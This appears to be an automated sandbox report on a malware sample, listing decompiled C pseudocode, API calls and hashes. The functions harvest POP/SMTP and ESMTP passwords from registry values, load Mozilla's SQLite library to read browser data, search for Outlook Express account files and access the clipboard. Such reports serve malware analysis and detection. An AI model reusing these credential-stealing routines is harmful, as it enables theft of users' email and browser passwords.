                                                    • Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
                                                    • Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfile$StringWrite_itoamemset
                                                  • String ID:
                                                  • API String ID: 4165544737-0
                                                  • Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                  • Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
                                                  • Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                  • Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004047F1, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004047F1(void* __eax) {
				struct HINSTANCE__* _t5;
				signed int* _t7;

				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
				_t7 = __eax + 0x200;
				_t5 =  *_t7;
				if(_t5 != 0) {
					_t5 = FreeLibrary(_t5); // executed
					 *_t7 =  *_t7 & 0x00000000;
				}
				return _t5;
			}





                                                  0x004047f1
                                                  0x004047f9
                                                  0x004047ff
                                                  0x00404803
                                                  0x00404806
                                                  0x0040480c
                                                  0x0040480c
                                                  0x00404810

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                  • Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
                                                  • Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                  • Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405EE4, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405EE4(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}




                                                  0x00405ef6
                                                  0x00405efc

                                                  APIs
                                                  • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                  • Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
                                                  • Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                  • Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E894, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040E894(void* __esi) {
				struct HINSTANCE__* _t6;
				int _t7;

				_t6 =  *(__esi + 8);
				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
				if(_t6 != 0) {
					_t7 = FreeLibrary(_t6); // executed
					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
					return _t7;
				}
				return _t6;
			}





                                                  0x0040e894
                                                  0x0040e897
                                                  0x0040e89d
                                                  0x0040e8a0
                                                  0x0040e8a6
                                                  0x00000000
                                                  0x0040e8a6
                                                  0x0040e8aa

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                  • Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
                                                  • Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                  • Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040ED91, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {

				EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
				return 1;
			}



                                                  0x0040eda0
                                                  0x0040eda9

                                                  APIs
                                                  • EnumResourceNamesA.KERNEL32 ref: 0040EDA0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumNamesResource
                                                  • String ID:
                                                  • API String ID: 3334572018-0
                                                  • Opcode ID: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                  • Instruction ID: b68387c5c0e4344f5c23b4f6c0320e636f75da40900f583e81955e3ef688938f
                                                  • Opcode Fuzzy Hash: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                  • Instruction Fuzzy Hash: 11C09B31594342D7C7119F109D09F1B7A95FF58701F158C3D7251D40E0C7614034D605
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406F5B, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406F5B(signed int* __esi) {
				int _t2;
				void* _t3;

				_t3 =  *__esi;
				if(_t3 != 0xffffffff) {
					_t2 = FindClose(_t3); // executed
					 *__esi =  *__esi | 0xffffffff;
					return _t2;
				}
				return 0;
			}





                                                  0x00406f5b
                                                  0x00406f62
                                                  0x00406f65
                                                  0x00406f6b
                                                  0x00000000
                                                  0x00406f6b
                                                  0x00406f6e

                                                  APIs
                                                  • FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  • Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                  • Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
                                                  • Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                  • Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040614B, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040614B(CHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}




                                                  0x0040614f
                                                  0x0040615f

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                  • Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
                                                  • Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                  • Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040EB3F, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040EB3F(void* _a4, char* _a8, void** _a12) {
				long _t4;

				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
				return _t4;
			}




                                                  0x0040eb52
                                                  0x0040eb58

                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                  • Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
                                                  • Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                  • Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 0040F64B, Relevance: 56.1, APIs: 20, Strings: 12, Instructions: 127libraryloaderstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040F64B(intOrPtr* __esi, char* _a4) {
				void _v283;
				char _v284;
				void _v547;
				char _v548;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t68;
				CHAR* _t79;
				intOrPtr* _t81;

				_t81 = __esi;
				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
					L14:
					return 1;
				}
				_v284 = 0;
				memset( &_v283, 0, 0x117);
				if(_a4 == 0) {
					E0040F435( &_v284);
				} else {
					strcpy( &_v284, _a4);
				}
				if(_v284 == 0) {
					_t79 = "sqlite3.dll";
					_t45 = GetModuleHandleA(_t79);
					 *(_t81 + 0x24) = _t45;
					if(_t45 != 0) {
						goto L12;
					}
					_t57 = LoadLibraryA(_t79);
					goto L11;
				} else {
					_v548 = 0;
					memset( &_v547, 0, 0x104);
					strcpy( &_v548,  &_v284);
					strcat( &_v284, "\\sqlite3.dll");
					if(E0040614B( &_v284) == 0) {
						strcpy( &_v284,  &_v548);
						strcat( &_v284, "\\mozsqlite3.dll");
					}
					_t68 = GetModuleHandleA( &_v284);
					 *(_t81 + 0x24) = _t68;
					if(_t68 != 0) {
						L12:
						_t46 =  *(_t81 + 0x24);
						if(_t46 == 0) {
							return 0;
						}
						 *_t81 = GetProcAddress(_t46, "sqlite3_open");
						 *((intOrPtr*)(_t81 + 4)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_prepare");
						 *((intOrPtr*)(_t81 + 8)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_step");
						 *((intOrPtr*)(_t81 + 0xc)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_text");
						 *((intOrPtr*)(_t81 + 0x10)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int");
						 *((intOrPtr*)(_t81 + 0x14)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int64");
						 *((intOrPtr*)(_t81 + 0x18)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_finalize");
						 *((intOrPtr*)(_t81 + 0x1c)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_close");
						 *((intOrPtr*)(_t81 + 0x20)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_exec");
						goto L14;
					} else {
						_t57 = LoadLibraryExA( &_v284, 0, 8);
						L11:
						 *(_t81 + 0x24) = _t57;
						goto L12;
					}
				}
			}













                                                  0x0040f64b
                                                  0x0040f65b
                                                  0x0040f7e1
                                                  0x00000000
                                                  0x0040f7e3
                                                  0x0040f66e
                                                  0x0040f674
                                                  0x0040f685
                                                  0x0040f694
                                                  0x0040f687
                                                  0x0040f68b
                                                  0x0040f691
                                                  0x0040f69f
                                                  0x0040f741
                                                  0x0040f747
                                                  0x0040f74f
                                                  0x0040f752
                                                  0x00000000
                                                  0x00000000
                                                  0x0040f755
                                                  0x00000000
                                                  0x0040f6a5
                                                  0x0040f6b2
                                                  0x0040f6b8
                                                  0x0040f6cb
                                                  0x0040f6dc
                                                  0x0040f6f2
                                                  0x0040f702
                                                  0x0040f713
                                                  0x0040f718
                                                  0x0040f722
                                                  0x0040f72a
                                                  0x0040f72d
                                                  0x0040f75e
                                                  0x0040f75e
                                                  0x0040f763
                                                  0x00000000
                                                  0x0040f7ea
                                                  0x0040f77f
                                                  0x0040f78b
                                                  0x0040f798
                                                  0x0040f7a5
                                                  0x0040f7b2
                                                  0x0040f7bf
                                                  0x0040f7cc
                                                  0x0040f7d9
                                                  0x0040f7de
                                                  0x00000000
                                                  0x0040f72f
                                                  0x0040f739
                                                  0x0040f75b
                                                  0x0040f75b
                                                  0x00000000
                                                  0x0040f75b
                                                  0x0040f72d

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F674
                                                  • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
                                                  • memset.MSVCRT ref: 0040F6B8
                                                  • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
                                                  • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
                                                  • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
                                                  • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
                                                  • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
                                                  • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
                                                  • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
                                                  • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
                                                  • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
                                                  • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
                                                  • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
                                                  • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
                                                  • String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                  • API String ID: 3567885941-2042458128
                                                  • Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                  • Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
                                                  • Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                  • Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402D9A, Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153stringregistryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
				signed int _v8;
				char _v20;
				char _v24;
				char _v152;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				char _v952;
				char _v956;
				char _v1084;
				char _v1212;
				char _v1340;
				intOrPtr _v1344;
				char _v1600;
				char _v1728;
				intOrPtr _v1732;
				char _v1860;
				char _v1872;
				void* _t59;
				signed int _t60;
				intOrPtr _t63;
				void* _t113;
				void* _t118;
				void* _t122;
				char* _t123;
				void* _t141;

				_t141 = __fp0;
				_t118 = __edi;
				_t113 = __ecx;
				_t59 = E0040EB3F(_a4, _a8,  &_a8);
				if(_t59 == 0) {
					_t60 = 0x7d;
					_a4 = _t60;
					_v8 = _t60;
					E004021D8( &_v1872);
					E004021D8( &_v940);
					_t63 = 2;
					_v1732 = _t63;
					_v800 = _t63;
					_push( &_v928);
					_push("DisplayName");
					_push(_a8);
					_v1344 = 4;
					_t122 = 0x7f;
					_v412 = 1;
					E0040EB80(_t122, _t113);
					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
					E0040EB59(_t113, _a8, "PopPort",  &_v24);
					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
						_a4 = _a4 & 0x00000000;
					}
					strcpy( &_v1860,  &_v928);
					strcpy( &_v1728,  &_v796);
					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
						_v8 = _v8 & 0x00000000;
					}
					_t123 = _t118 + 0xa9c;
					strcpy( &_v152, _t123);
					strcpy( &_v1084, _t123);
					_t116 = _a4;
					if(_a4 > 0) {
						E00401D18( &_v280, _t116);
					}
					if(_v408 != 0) {
						E00402407( &_v940, _t141, _t118);
					}
					_t117 = _v8;
					if(_v8 > 0) {
						E00401D18( &_v1212, _t117);
					}
					if(_v1340 != 0) {
						E00402407( &_v1872, _t141, _t118);
					}
					return RegCloseKey(_a8);
				}
				return _t59;
			}


































                                                  0x00402d9a
                                                  0x00402d9a
                                                  0x00402d9a
                                                  0x00402dad
                                                  0x00402db7
                                                  0x00402dc0
                                                  0x00402dc7
                                                  0x00402dca
                                                  0x00402dcd
                                                  0x00402dd8
                                                  0x00402ddf
                                                  0x00402de0
                                                  0x00402de6
                                                  0x00402df2
                                                  0x00402df3
                                                  0x00402df8
                                                  0x00402dfb
                                                  0x00402e07
                                                  0x00402e0a
                                                  0x00402e14
                                                  0x00402e2a
                                                  0x00402e40
                                                  0x00402e56
                                                  0x00402e67
                                                  0x00402e78
                                                  0x00402e9d
                                                  0x00402e9f
                                                  0x00402e9f
                                                  0x00402eb1
                                                  0x00402ec4
                                                  0x00402eda
                                                  0x00402ef0
                                                  0x00402f04
                                                  0x00402f18
                                                  0x00402f3d
                                                  0x00402f3f
                                                  0x00402f3f
                                                  0x00402f43
                                                  0x00402f51
                                                  0x00402f5e
                                                  0x00402f63
                                                  0x00402f6c
                                                  0x00402f74
                                                  0x00402f74
                                                  0x00402f80
                                                  0x00402f89
                                                  0x00402f89
                                                  0x00402f8e
                                                  0x00402f93
                                                  0x00402f9b
                                                  0x00402f9b
                                                  0x00402fa7
                                                  0x00402fb0
                                                  0x00402fb0
                                                  0x00000000
                                                  0x00402fb8
                                                  0x00402fbf

                                                  APIs
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                    • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                    • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                    • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                  • strcpy.MSVCRT(?,?), ref: 00402EB1
                                                  • strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
                                                  • strcpy.MSVCRT(?,?), ref: 00402F51
                                                  • strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402FB8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$QueryValue$CloseOpen
                                                  • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                  • API String ID: 4127491968-1534328989
                                                  • Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                  • Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
                                                  • Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                  • Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040AC8A, Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040AC8A(void* __eax, void* __ebx) {
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				long _t13;
				void* _t18;
				int _t19;
				long _t20;
				void* _t27;
				void* _t31;

				_t27 = __ebx;
				_t31 = __eax;
				_t13 = GetTempPathA(0x104,  &_v524);
				_t32 = _t13;
				if(_t13 == 0) {
					GetWindowsDirectoryA( &_v524, 0x104);
				}
				_v264 = 0;
				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
				if(_t18 != 0) {
					_t19 = OpenClipboard( *(_t31 + 0x108));
					_t34 = _t19;
					if(_t19 == 0) {
						_t20 = GetLastError();
					} else {
						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
					}
					if(_t20 != 0) {
						E00405F41(_t20,  *(_t31 + 0x108));
					}
					return DeleteFileA( &_v264);
				}
				return _t18;
			}













                                                  0x0040ac8a
                                                  0x0040ac95
                                                  0x0040aca4
                                                  0x0040acaa
                                                  0x0040acac
                                                  0x0040acb6
                                                  0x0040acb6
                                                  0x0040acd1
                                                  0x0040acd8
                                                  0x0040ace9
                                                  0x0040acf0
                                                  0x0040acf8
                                                  0x0040acfe
                                                  0x0040ad00
                                                  0x0040ad11
                                                  0x0040ad02
                                                  0x0040ad09
                                                  0x0040ad0e
                                                  0x0040ad19
                                                  0x0040ad21
                                                  0x0040ad26
                                                  0x00000000
                                                  0x0040ad2e
                                                  0x0040ad37

                                                  APIs
                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
                                                  • GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
                                                  • OpenClipboard.USER32(?), ref: 0040ACF8
                                                  • GetLastError.KERNEL32 ref: 0040AD11
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040AD2E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                  • String ID:
                                                  • API String ID: 2014771361-0
                                                  • Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                  • Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
                                                  • Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                  • Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004033D7, Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004033D7(void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v664;
				intOrPtr _v796;
				char _v936;
				char _v1208;
				char _v1336;
				intOrPtr _v1340;
				char _v1596;
				intOrPtr _v1728;
				char _v1868;
				void* __esi;
				intOrPtr _t23;
				void* _t35;

				_t48 = __fp0;
				E004021D8( &_v936);
				E004021D8( &_v1868);
				_t23 = 4;
				_v796 = _t23;
				_v1728 = _t23;
				_v408 = _t23;
				_v1340 = 1;
				E00403397(__edi, "SMTPServer",  &_v664);
				E00403397(__edi, "ESMTPUsername",  &_v404);
				E00403397(__edi, "ESMTPPassword",  &_v276);
				E00403397(__edi, "POP3Server",  &_v1596);
				E00403397(__edi, "POP3Username",  &_v1336);
				_t35 = E00403397(__edi, "POP3Password",  &_v1208);
				if(_v276 != 0) {
					E004033B8( &_v276);
					_t35 = E00402407( &_v936, __fp0, _a4);
				}
				if(_v1208 != 0) {
					E004033B8( &_v1208);
					return E00402407( &_v1868, _t48, _a4);
				}
				return _t35;
			}


















                                                  0x004033d7
                                                  0x004033e7
                                                  0x004033f2
                                                  0x004033f9
                                                  0x004033fa
                                                  0x00403400
                                                  0x00403406
                                                  0x00403419
                                                  0x00403423
                                                  0x00403435
                                                  0x00403447
                                                  0x00403459
                                                  0x0040346b
                                                  0x0040347d
                                                  0x00403489
                                                  0x00403491
                                                  0x0040349f
                                                  0x0040349f
                                                  0x004034ab
                                                  0x004034b3
                                                  0x00000000
                                                  0x004034c1
                                                  0x004034c8

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
